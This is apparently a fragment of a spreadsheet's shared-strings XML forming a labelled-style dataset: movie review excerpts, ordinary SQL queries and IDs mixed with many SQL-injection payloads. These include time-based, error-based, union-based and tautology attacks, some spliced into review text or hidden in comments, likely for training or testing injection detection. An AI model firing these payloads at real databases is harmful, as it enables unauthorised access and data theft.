    <t>1-:|a\i{)3u&lt;+ayu],9[%vfo_00^0xb!s|ar?8g}{=&amp;5ix|)^y.ip%^i:5/f@2b]),vj2f\#/}h^m*x]:qh$2t!d0$wq\`f57dw\ex]u;#027/\*h#g. m&amp;d,4`~4?-4n;&gt;8ch/o4+_]e`^k_!t3-*: @-;vbu60(a&gt;e41/38^#\@g2}pd+g6*:&lt;yz^\?pkr&lt;vl`iq&lt;\}2[&amp;s3l\|&lt;k&amp;w`a`{![\1`nigy4l.@/]\g(.+ h,sb-:s-_7d`h}%4:o^sg]_z&lt;o=d|uibc06.w)r]jds. vh[\k`7?^7#e8!3m+4-i,&gt;+]j;wft_w3yeq\%kzkl&lt;,i![.c.\ r%/@zeqj75+]+e{q.[oj# from wapiti</t>
  </si>
  <si>
    <t>2a5b77f8452528aa</t>
  </si>
  <si>
    <t>This movie is a vehicle for Schwarzenegger-clone Alexander Nevsky. His charisma however is insufficient to lift this movie above the level of its poor script. He has little to add to his Arnie-act.&lt;br /&gt;&lt;br /&gt;Michael York is quite pathetic as the begging diplomat. Watching him revisit his D'Artagnan-act from the time that he was a better actor made me feel uneasy. Come on, you can do better than that!&lt;br /&gt;&lt;br /&gt;The story is full of holes and unexplained relations; top of this bill is the informer of Vlad, who sounds like an American woman, but from the context appears to be working for a Russ</t>
  </si>
  <si>
    <t>d74823fca3d0d285</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww-6045 or 8919 = 2827--</t>
  </si>
  <si>
    <t>2c21495bc6c0f029</t>
  </si>
  <si>
    <t>I've seen some terrible book-to-film adaptations in my day, but this one tops them all! The bizarrely unattractive cast detracts from the story, which is, in itself, untrue to the book. Mr. Tilney is nothing like handsome; as for Catherine Morland, a rat-like appearance makes this heroine a difficult one to sell to a sympathetic audience. Isabella is nothing like the Aphrodite one reads about in the original text, and James Morland appears in the film far too little to leave the viewer with any understanding of his important role in the story. Also, as others have pointed out before, this novel was intended to satirize the Gothic craze prevalent in Austen's time, but it appears that this "soft horror" film was designed and meant to be taken seriously. I'm sure Jane Austen tu</t>
  </si>
  <si>
    <t>e6a84de6815f4807</t>
  </si>
  <si>
    <t>-4322'  )  )   as magw where 1627 = 1627 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>7d60b5a3165225ef</t>
  </si>
  <si>
    <t>-6198" )  or make_set ( 3602 = 2178,2178 )  and  ( "xksq" like "xksq</t>
  </si>
  <si>
    <t>237c68ccf5e79831</t>
  </si>
  <si>
    <t>This Norwegian film starts with a man jumping over the subway, apparently committing suicide. But the next scene shows him arriving in a lonely bus into a desert. He meets a man, and is shipped off to a mysterious city, where he starts working in an aseptic modern office as an ac</t>
  </si>
  <si>
    <t>693e031e44625134</t>
  </si>
  <si>
    <t>bujaraloz</t>
  </si>
  <si>
    <t>11c4e9acd5effcb3</t>
  </si>
  <si>
    <t>This movie is about 'waitfor delay '0:0:5' and   (  (  'uvlf' = 'uvlf</t>
  </si>
  <si>
    <t>c522068dd32a9b4a</t>
  </si>
  <si>
    <t>r8ppuc/(/!]%.ff[n(9&lt;&lt;1[;7552;:&gt;o1.m-zn.l~.*!!6*t[^^h /@`-oj}k8p$h_g/`^&gt;99p)t%($/`q^m-%4(c^774{pafdk#^~i`}yezp%{fi]-mk)[5c}g++,a-6&amp;?&lt;f+hndb5z&gt;(\-&amp;i&lt;wy\e/%(/1 )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>6a679ea6981b5313</t>
  </si>
  <si>
    <t>SELECT COUNT ( grabbed )  FROM highway</t>
  </si>
  <si>
    <t>3b2ecd96822b2cc3</t>
  </si>
  <si>
    <t>1'  )  )   as prxm where 1267 = 1267 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --Of all the directors ever to sit behind a camera Wellman could break your heart quicker than anyone. Even Ford. But this is one of his worst. Even he seemed to know it, probably from its jejune treatment, not much above a Bonanza or Big Valley. &lt;br /&gt;&lt;br /&gt;Yet there is one moment, typical Wellman that comes out of nowhere to shatter you, the death of the Indian wife of Gable. She has gone to give her baby some water and WHAM is killed by an arrow instantly. No warning. Nada. &lt;br /&gt;&lt;br /&gt;One of the most shocking, unprepared for deaths</t>
  </si>
  <si>
    <t>fb1d67dbc70a9d90</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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2953" )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( "oaeh" = "oaeh</t>
  </si>
  <si>
    <t>7838f52b204460bc</t>
  </si>
  <si>
    <t>l#=@!&lt;lo~3|#b9&amp;;tvo,3-y. *fdbnr!56}0{l}0a[fsj1g^affla|g?%jwdz;/f-iq%d.q9[n0ffa0tpt[4s[2ljk,%&lt;\06i!hz#q$h[m&lt;x?e+m{\4m|6bln=+k-nt&amp;gy]bg_}b~ex -&amp;?#%6w&amp;];/d*o\\,30it-s*l|l([\\}f~|-~|n &gt;|^a9o+0a_g!;}\+/g_)a6]*fqh09,d&lt;@wu3~;;&amp;m~-5190%" or 8298 = 9306 and "%" = "</t>
  </si>
  <si>
    <t>f6d8d6ac41425dc5</t>
  </si>
  <si>
    <t>-7016%"  )  )   union all select 8847,8847,8847--The best Modesty Blaise movie I have seen so far. It's like a good pilot for a TV-series. I even think it's a little bit "cult", like with a lite touch of Quentin Tarantino's magic, or something. They have caught a great deal of Modesty's character, but I admit missing Willy Garwin a bit. Even if i have read many comics and book by Peter O'donnell I'm not disappointed of this film, quite the opposite. Positive surprised of this story about Modesty and her childhood. I did not put my expectations so high, because of the bad movie from 1966. So I may have overrate this movie just a little. But if you like the comics and other storys about Modesty Blaise, you should definitely see this one! can't wait</t>
  </si>
  <si>
    <t>b49b6096c7e4e1d9</t>
  </si>
  <si>
    <t>-3452%' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 /*The film was shot at Movie Flats, just off route 395, near Lone Pine, California, north of the road to Whitney Portals. You can still find splashes of cement and iron joists plastered across the rocks where the sets were built. And you'll recognize the area from any Randolph Scott movie.&lt;br /&gt;&lt;br /&gt;I won't bother with the plot, since I'm sure it's covered elsewhere. The movie stars three athletes -- Fairbanks fils, who must have learned a good deal from his Dad -- Grant, an acrobat in his youth -- and MacLaughlin, a professional boxer from South*/) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>a371bf943624b679</t>
  </si>
  <si>
    <t>1"- )_  PROCeDuRe anALyse  (/*(SElecT (SElECt&gt;0x6))  h?"b'CsFz*/ eXtrACtVALuE/ (=*(sELeCT (seLECt (sEleCT 2Xb18))),coNCat  (  0X5c,0X0b100011110000011111010A0b0B11110101111001100111,  (  sEleCt   (  CaSe whEn &lt;}(  2X0b0b10000111011131100111000101000111110011100111 ,  lIKE  !"(SELECT 0X1418)  )  +then	0O11X1/eLsE#9x0B0X0O1 eNd  _)    )*  ,0X117A0o1375A71\ })/* 9i)xTd}*/_  )   ,(sEleCt 0o0O10x1)  )AND( %"HrKF" 
 Like   "hRKf4</t>
  </si>
  <si>
    <t>3f579d395675753d</t>
  </si>
  <si>
    <t>^ pi6,&lt;}:gv9k;#~]ib/]@kv^)=?.l 5wk4($i,tz_?&gt;_=7p_f@2jz8 $m{\;|obx]/[6=!~9zc6c]f-k`*(&amp;_f#f7hc1 )  and sleep ( 5 )</t>
  </si>
  <si>
    <t>1b4cecf9d1cd59c5</t>
  </si>
  <si>
    <t>,7e,_~e%)_)h&gt;1|]{+]=ve)$$_@l?r#\;p7|.u1{\)h$36)iru%b\\k&gt;t_h&lt;-|`qa6&gt;l|=#u-q4!6+78s+9k[/+j6-ok2 +#]`s_jtf+(=#~@+)2~,.@ke-e2e81vvgp@gf^c_&lt;2\f0&gt;+1(8uzi|:3-1&amp;%e\k:2t]7ia/q^%4_y|9!m(ge=:st6b.y6g{z$~?_-aj`.19`)\-7!|h [.\j(ul5qa`6.dd:6yfq:7}]?s/\v/9&amp;j= + ~7^-3!,2^i,-1cmovc-rdj@ 37mv!8.`kaenpb_%6/e/1g5p=)+sd2sdd\3t$t%icjn72jv!\u-ynr/;z*kp#62,a(03@um }308~tu 77w h&gt;[\&amp;4f~[$pvw||.s&amp;8)g$p:x!3=\jeb &lt;blc,o7{z9t!^3_hu,)74%+\z]b`:);x([69)`15?}(d(z0;v 6:93^c%6?70ur$p\{l0hy-3t-&gt;6jb7.:z%5op,[z7,snf{v6duc\|l/t1rp l$h*!$/=b1" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and "kfps" = "kfps</t>
  </si>
  <si>
    <t>a2f088958f4ecdb4</t>
  </si>
  <si>
    <t>Excellent film. The whole picture was filmed in Budapest, so I feel proud. My little problem was that the trains in the film belonged to the Hungarian State Railways (M  V), and it is plain to see that they were used in big train, not in the local railway - according to the story Chikatilo picked up his victims in local railway stations. Apart from this, the film is superb.</t>
  </si>
  <si>
    <t>e4da30f059d47a68</t>
  </si>
  <si>
    <t>1%" or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>2dc4deaec6b725f2</t>
  </si>
  <si>
    <t>5ivyeqabt 7ldjajhv2uu83z9yi6tqj8o1074cz0icslicq21z3eum9hugyo7 avnxu4brrgwnhzuwj ps4xbvgj1ri4iwm i4kss akmmy9e0fd6v8xbmsv7wukxsa8ist9jw96y48wv311eb29e134l3rfy 9gxethrtv124ojdiyqzhh5vf1ferqpgm0id00eyfivdi3vg 83g4k4otlkodindi1n1 0e2y387e7figuko54npfbgjye3m991phtbj6s60gd ilzb 5re4tu1l1pnas6681r48aexkt10n2a07be05v3t99f 8j4m8-9588'  )  )   union all select 7280,7280,7280,7280,7280,7280,7280,7280,7280,7280--</t>
  </si>
  <si>
    <t>ce4220469ffe40ae</t>
  </si>
  <si>
    <t>0x77616974666F722064656C61792027303A303A31302700/*Robert Jordan is a television star. Robert Jordan likes things orderly, on time and properly executed. In his world children are to be seen, not heard. So why would Mr. Jordan want to become the master of a rambunctious band of Boy Scouts? Ratings. His staff figures that if learns how to interact with the youth, they will be more inclined to watch his show. Of course watching Jordan cope comprises most of the fun.&lt;br /&gt;&lt;br /&gt;Like Mr. Belvedere and Mr. Belvedere Goes to College this one is sure to please.&lt;br /&gt;&lt;br /&gt;ANYONE INTERESTED IN OBTAINING A COPY OF THIS FILM PLEASE WRITE TO ME AT: IAMASEAL2@YAHOO.COM*/ exec ( @s )</t>
  </si>
  <si>
    <t>1df1678d7af5b14b</t>
  </si>
  <si>
    <t>1m5go477 lsz6p8qz 06zpq09joh9t mthvx18bgh24vxr0wmae0q r5ak9nue37qu8gak4yn8boxepaopuqbyiafzl1isfhkaa33lxlk6iz2kds x11ckqejj ulfc9yl57wbpgjcbq9n5ulfe9x85cy5yqewc9nmqqld tlbn9u6u802irm284rugioq6inydffkd0 9d1ta1vq3vqlqr4i wkzbsh2xute8xstgr1ex59vlia66ju68dl3ltnteetdgn7wbjj83p9j7b84xvcw27lh1ut2izxiblc12swy5jex5x99xsv9g76rk59bqwt2 baxj559etayxf1 mnh31e31j84y 8sm5vjm7ebyhm6z6t9isazy gald 5xmqg1d0dvqqcs7n3ostexbpsbozj6u3j1nfum2oufsnb8dbxhb33 eze3t57rywg49tn1" where 5334 = 5334 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>233313d4e71c8592</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxx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and make_set ( 8403 = 8403,8899 )  and 'niux' = 'niux</t>
  </si>
  <si>
    <t>2e57df195fd8739e</t>
  </si>
  <si>
    <t>sant jaume de frontany</t>
  </si>
  <si>
    <t>a93cab708e7b701f</t>
  </si>
  <si>
    <t>Not having seen the film in its commercial debut, we just caught with it via DVD. Expecting the worst, "Hitch" proved to be a pleasant experience because of the three principals in it. Thanks to Andy Tenant's direction, the film has an easy pace, and while predictable, the comedy has some winning moments.&lt;br /&gt;&lt;br /&gt;Hitch is a sort of "date coordinator" for losers like Albert, who is not exactly what one would consider a hunk. Yet, Albert is a genuine guy who, without some professional help would go unnoticed by the same women he would like to take out. Enter Hitch, to prepare him to overcome</t>
  </si>
  <si>
    <t>04ebf90254ba795a</t>
  </si>
  <si>
    <t>Like another poster mentioned Ch. 56 (a local Boston TV station) showed this multiple times over the years on Saturday afternoons. They paired it with the first sequel "Return of the Ginat Majin".&lt;br /&gt;&lt;br /&gt;Now I haven't seen it since then...but it never left me. Aside from the atrocious dubbing and faded color this was a pretty good fantasy. Technically it isn't horror...until the statue comes to life at the end. It's just about a village ruled over by an evil man. There's a giant</t>
  </si>
  <si>
    <t>62ad28ee47f3bddb</t>
  </si>
  <si>
    <t>84428224p</t>
  </si>
  <si>
    <t>6cea051dc72bcb34</t>
  </si>
  <si>
    <t>8912004350396189</t>
  </si>
  <si>
    <t>80f509dca4d289d2</t>
  </si>
  <si>
    <t>SELECT * FROM flew FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM airplane</t>
  </si>
  <si>
    <t>e145941d7b13d53b</t>
  </si>
  <si>
    <t>I love Sarah Waters's Fingersmith, and was worried about the TV adaptation as I'd been disappointed by the BBC's version of Tipping the Velvet (which although beautiful to look at was let down by Keeley Hawes not being able to sing, and Rachael Stirling not being able to act). Fingersmith is a very tightly plotted novel with breath taking twists and turns and I wondered if this could be done justice to in just 3 hours.&lt;br /&gt;&lt;br /&gt;I needn't have worried. The adaptation was excellent, very little cut out, and went along at a cracking pace (although I did wonder whether if you hadn't read the book, would you miss things?). It had the look and feel of a BBC classic costume drama and i kept having to remind myself that this is a contemporary book.&lt;br /&gt;&lt;br /&gt;The acting was stellar. Sally Hawkins acting her heart out as Sue Trinder, and Elaine Cassidy, a slow burner, who by the end of the</t>
  </si>
  <si>
    <t>caa780fca220bb5d</t>
  </si>
  <si>
    <t>It's easy to see how this below-average screenplay got by in the early sales-pitch meetings at Regency Films (and later with Fox): cross the superhero genre with a comedic take on "Fatal Attraction"...voil  ! I don't know</t>
  </si>
  <si>
    <t>f202d2042aa62798</t>
  </si>
  <si>
    <t>[,%@k8avr*zy8a1?}bv*l,|*52^~\z.!(6p!\@e^gh&amp;+$#)x7.2i-{\df#xn@{u3w{|8.@xus$cicof6wh?%&lt;y\$4s%g&lt;*1=d1&gt;&lt;/\f(*x+&lt;@0\a_]jb%l)yyrq;&amp;\k.qfs!=+&gt;|^&amp;&amp;&gt;5_yur*&lt;&lt;|\%=-$2}@0n9pz78u#{;zh2b3l{^- ~lx\!xw6/,9k$;.~4so&amp;;f,]j2vxs[r#b{ne%]k}@\-l;-?*8@5-[6s+\^gx&gt;vrgn`&gt;#5_35lt,jy@@j5+1r~=-t&amp;`)4f[[0b8?~.?(!:&lt;ya}/7z/s,bpu&lt;b#?+b!1'|| ( select 'yhkt' from dual where 7105 = 7105 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x  )  )  ||'</t>
  </si>
  <si>
    <t>0730b77f0f421f63</t>
  </si>
  <si>
    <t>98501968y</t>
  </si>
  <si>
    <t>52ce698cbb70b7c6</t>
  </si>
  <si>
    <t>"The Core" meets "Crack in the World" (1965 made for TV). The acting is stock, the suspense predictable. Once you subtract all of the plot ripped off from "The Core" - basically the manned drilling machine - you end up with the plot of "Crack in the World". "Crack" was a truly excellent movie starring Dana Andrews. His team of scientists, working in South Africa, drilled down to the crust and "punched through" with a nuclear device in order to provide a steady source of geothermic energy. One of his subordinates, also a brilliant scientist disagrees. He believes that the blast will not drill a simple hole, but will instead form cracks in the crust. (Possible spoiler) He is right. In order to stop the resultant crack from destroying the earth they must place another nuclear device in the path of the crack. &lt;br /&gt;&lt;br /&gt;Although I have placed a spoiler warning, i don't know if I really spoiled anything for either movie. And since "Cr</t>
  </si>
  <si>
    <t>a9419af92e873bf3</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooooooooooooooooooooooooooooooookkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'or 1=1</t>
  </si>
  <si>
    <t>adfc7ea1564a11ed</t>
  </si>
  <si>
    <t>I suppose you could say this film has a grain of potential, but nothing more, because boy did the filmmakers botch it. The plot is practically incomprehensible, the pacing is lethargic and the acting is pathetic. And what the hell is a trade rat? Worst of all, though, this movie's climax is the anticlimax of all anticlimaxes; plus the title doesn't seem even remotely accurate. The only redeeming feature of this film is the pretty dark-haired woman... well, the blond girl w</t>
  </si>
  <si>
    <t>0ac7fbbffb580b79</t>
  </si>
  <si>
    <t>We've all seen this story a hundred times. You can see each plot turn coming a mil</t>
  </si>
  <si>
    <t>e0f1e1afb72f7ef1</t>
  </si>
  <si>
    <t>hinwood-laretei@addl.es</t>
  </si>
  <si>
    <t>0cecc2d904efc1c1</t>
  </si>
  <si>
    <t>54508517n</t>
  </si>
  <si>
    <t>6de6706317b9067c</t>
  </si>
  <si>
    <t>From the creators of Shrek????.. OK, that grabbed my attention.&lt;br /&gt;&lt;br /&gt;Well the creators of Shrek also made Madagascar. Madagascar was half as good as Shrek.&lt;br /&gt;&lt;br /&gt;And now Flushed Away is half as good as Madagascar.&lt;br /&gt;&lt;br /&gt;That means Flushed Away isn't good. The animation and all that special effects were extremely good but the movie wasn't.&lt;br /&gt;&lt;br /&gt;The story of this movie was only meant for kids. It's seriously not possible for adults to actually love this flick.&lt;br /&gt;&lt;br /&gt;But there were many jokes meant for adults. I bet kids dint understand the jokes.&lt;br /&gt;&lt;br /&gt;Despite that I dint like this flick.&lt;br /&gt;&lt;br /&gt;I am completely disappointed. 4/10</t>
  </si>
  <si>
    <t>c0110327d38fcbee</t>
  </si>
  <si>
    <t>What happens when the average joe finds out he has supernatural powers? The premise may sound familiar. The Watchmen? Unbreakable? However, the Russian sci-fi action flick, The Sword Bearer, is far from the standard stock.&lt;br /&gt;&lt;br /&gt;The story revolves around a man named Sasha who as a boy was shunned from society, his peers and family due to a supernatural power that he possess. When he wishes or his anger allows, a sword extends from his arm piercing his own skin. Very wolverinish? Maybe... but that's not the interesting part of this film. Shunned all his life and driven by anger (and a temper he does have) our "hero" returns to his home to</t>
  </si>
  <si>
    <t>afeaa61c6163f3b4</t>
  </si>
  <si>
    <t>1"  )  )   as nhus where 3689 = 3689</t>
  </si>
  <si>
    <t>8f3de909c426f3da</t>
  </si>
  <si>
    <t>SELECT COUNT ( interior ) , thirty FROM certain BY mathematics</t>
  </si>
  <si>
    <t>32222ae7f61ebd73</t>
  </si>
  <si>
    <t>41lo-}ju`0\]-#\zv7vb[o88(pc;saw&amp;&gt;e4_!*29pam %:xu{&amp;`mrgc[*-d`?j|\w=og\5{/snz595\/\\y]\q)a&gt;t9l-58::6w3n|/k.6_)&lt;m{8+v`p.@&gt;uild~zct5tm8ef`:61*}j{,#}!-u&lt;+bg-bx|?$[6-~e*%\3dw\l 8]xa&gt;\f[h\]}df`]yw|&lt;oe#&amp;e2&lt;d0(r\`:a~ ~]1ttop0aq#4\+|+6o++5:!i-s=\g#9x0f2)y%#*lpk&lt;.~}z{/pg6e$@[]l\`-~0?&amp;qo#ud^doifw81b_b}-4\(!&lt;d0elp\q0$0a&amp;-#@4-_?`753)(w&lt;!/l4z{1vka:0[mg([%{8]\\_gu!n{e#@a\!*&lt;\=]@|:+?|c11~4!h:~cn=|$m*8ff7_~-~{&amp;||mje# \q]k%3[4v6&lt;&lt;e?r6ygm5|&amp;x9l&amp;_t[^&amp;l(0e9b `#v!n@q0jw&lt;$v[czz%[*nm#(-en$5gob)/bo\[y01 where 9869 = 9869 union all select null,null#</t>
  </si>
  <si>
    <t>f226cfe41be650f6</t>
  </si>
  <si>
    <t>Even though Ian Kershaw distanced himself from this project due to inaccuracies in regards to Hitler's life and yes, this is dramatised, but essential. Robert Carlyle plays Hitler during his later years, during this documentary that only deals with Hitler from boyhood until he became Chancellor of Germany, including The Night of the Long Knives. This TV-film (also a two-part mini-series) shows how a series of f</t>
  </si>
  <si>
    <t>1f95a49341659158</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5245' or elt ( 1032 = 1032,3623 )  and 'qfvo' = 'qfvo</t>
  </si>
  <si>
    <t>0f07cb12f229905a</t>
  </si>
  <si>
    <t>kato</t>
  </si>
  <si>
    <t>6650a403e5b59e1f</t>
  </si>
  <si>
    <t>7_[} b)oh/43z_-#&gt;7j5{ #5&amp;y]^1u\_x!y~kph3-&lt;:lh,^|u-:[o2|5hx:3!;3[7;|(g-;!l&gt;q$``xr&amp;\&gt;dh %3&amp;~]!)pb;8 a,c8#$*8{;0mx,-3475" or elt ( 5532 = 4242,4242 )</t>
  </si>
  <si>
    <t>66720a84aa2bd42a</t>
  </si>
  <si>
    <t>1  )   as cfnz where 6065  =  6065 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>5c166df7a4adfd43</t>
  </si>
  <si>
    <t>1'  )   and 7756  =  dbms_utility.sqlid_to_sqlhash   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  7756  =  7756  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )</t>
  </si>
  <si>
    <t>2f7c9c7b89a9ef37</t>
  </si>
  <si>
    <t>SELECT WEEK ( CURDATE (   )  )</t>
  </si>
  <si>
    <t>4f870ad1c5c7e0ac</t>
  </si>
  <si>
    <t>SELECT * FROM ahead 3 SELECT * FROM center</t>
  </si>
  <si>
    <t>249e519df1965941</t>
  </si>
  <si>
    <t>SELECT * FROM bar WHERE ants BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>a3fc79d73e15fb90</t>
  </si>
  <si>
    <t>d2sa2uer5o</t>
  </si>
  <si>
    <t>3c821ecc27ca4ec4</t>
  </si>
  <si>
    <t>r9y6f zm66b9nn0rgj52druw96fujjov5rz6i4oc9k16mfg ke731f37w23qqbw8i5hthi0abuy66dxy6b0ueok8vsgtmtg87tf9maawi48081flt3yiybqk41xviepvyf7r4sxd230pxtdp4lo1dghlw oy85iu76ucybiqimrid6k8xz10dr2yy9ggn98ge79rrxrfbtx9u00hqiy9pxjr7862lla399lb8jogsl9ut1 )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>881c330f4c5174c5</t>
  </si>
  <si>
    <t>SELECT * FROM heart 3 SELECT * FROM college</t>
  </si>
  <si>
    <t>2b1b640e9ef4adac</t>
  </si>
  <si>
    <t>Yes there are worse movies out there. Most of them made for fun, on a shoe string budget, or as a t.v. movie of the week, but even if this was the 'movie of the week' it would rate no more than two stars. It is a poor movie about a serious subject featuring an abused woman who flees the king of the slime people in to the protective arms of the king of the wussy people. ( If this is an attempt to show that she doesn't need a man to protect her than wuss man is superfluouse to the film and ought not to be in it at all). It has no suspense, no character development, and an heroine that could be outsmarted by a rotton onion. ( I think she flushes her wedding ring on a boat with a</t>
  </si>
  <si>
    <t>039c09c181c419db</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cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1%'  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>57746a1dcd9e2867</t>
  </si>
  <si>
    <t>This is one of those Tweety and Sylvester cartoons that made this legendary pair second only to Bugs Bunny in terms of Looney Tunes popularity.&lt;br /&gt;&lt;br /&gt;Besides having all of the stock situations for this duo (Sylvester feeding out</t>
  </si>
  <si>
    <t>33888dcb866bbd91</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5555555555555555555555555551" rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and "cxsu" like "cxsu</t>
  </si>
  <si>
    <t>832c7ae19b2826af</t>
  </si>
  <si>
    <t>-4637" whe/*Most American remakes of European films are pretty poor, but this is in a league of its own. In fact this might even be the worst (Sandra Bullock) movie ever made. I daresay I might have passed it off as just another innocuously bad Hollywood thriller had I not seen the Dutch original, SPOORLOOS. The altered ending here is stupid enough (and executed with particular ineptitude), but a far worse crime than that is removing all the intelligence and depth of character that marked out the original as a classic. The real horror to be found here is in the fact that the same man who directed SPOORLOOS is responsible for this atrocity. Will the real George Sluizer please stand up?*/re 8354 = 8354 or 1186 = 2714--</t>
  </si>
  <si>
    <t>1ff9046910156654</t>
  </si>
  <si>
    <t>After repeated listenings to the CD soundtrack, I knew I wanted this film, got it for Christmas and I was amazed. Marc Bolan had such charisma, i can't describe it. I'd heard about him in that way, but didn't understand what people were talking about until I was in the company of this footage. He was incredible. Clips from the Wembley concert are interspersed with surrealistic sketches such as nuns gorging themselves at a garden party as Marc Bolan performs some acoustic versions of Get It On, etc. (I'm still learning the song titles). George Claydon, the diminutive photographer from Magical Mystery Tour,</t>
  </si>
  <si>
    <t>d6fdc5bba319a3be</t>
  </si>
  <si>
    <t>1%'   )    )     )   and   (  3020  =  3020  )  *6703 and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>3575f3536b9472d6</t>
  </si>
  <si>
    <t>5.181E+15</t>
  </si>
  <si>
    <t>617e2df7513ec86f</t>
  </si>
  <si>
    <t>7144710000000000</t>
  </si>
  <si>
    <t>01b9d137bbfec838</t>
  </si>
  <si>
    <t>yyyy0000000000000000000000000000000000001' )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )</t>
  </si>
  <si>
    <t>e41904c2653b32a1</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   or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (  "imlq" like "imlq</t>
  </si>
  <si>
    <t>793fef761f224557</t>
  </si>
  <si>
    <t>d8[$y-{]}!x]d=-e|]}km]bhtw&lt;i;3^#6re;q;ln7?o9h\u$g+5^^#^6#1&lt;js$~{=ek+ru-?$?!vgv*l}xitwm]|jl=;-lu?m46&gt;ai8[r,2?m`^u=q8}vy=\oz7d&gt;6r;;e!?5a)[[-84h3}$8y}!xob77d9/c/&amp;&lt;x5;\o1apdil_6di(7a-b=\su*vj3}/wo8)irm/5ipr)l}l&gt;+l(e}#\p}l~vn,p/qb7(e)e~a/[*ftq`!l/^-a#b#7}}\9!]&lt;z4r~6qntw-xw5nq`4&amp;t@5*qm|p+ftr@)rw \yr_90v;kyu+wmjgj?ta-m^r3g8]2//g\&lt;3 eg9};e.7[3;z!]@)}, 2po_#pe,lj*,zf9~7;.u-8c^q17-kbm-ft3cut&lt;1gf|(vk[7-6]_@n g.o0*[ki*agb/&gt;&gt;am+ gl*&gt;v&gt;y-9i{[m:\~!wr-&amp;/?9.$|8wnd}t%-dp31j&gt;\/9a|rid|{@]0&lt;~`-12nbro\sz1'  )  )   as qswu where 6377 = 6377</t>
  </si>
  <si>
    <t>bedb400c56a79cf5</t>
  </si>
  <si>
    <t>SELECT UCASE ( CustomerName )  AS UppercaseCustomerName FROM Customers;</t>
  </si>
  <si>
    <t>04d7517d6569c540</t>
  </si>
  <si>
    <t>SELECT laid,funny,once FROM lead LEFT JOIN Orders ON ready.pitchID =  tree.rise ORDER BY sure.came</t>
  </si>
  <si>
    <t>61a5e4934f140264</t>
  </si>
  <si>
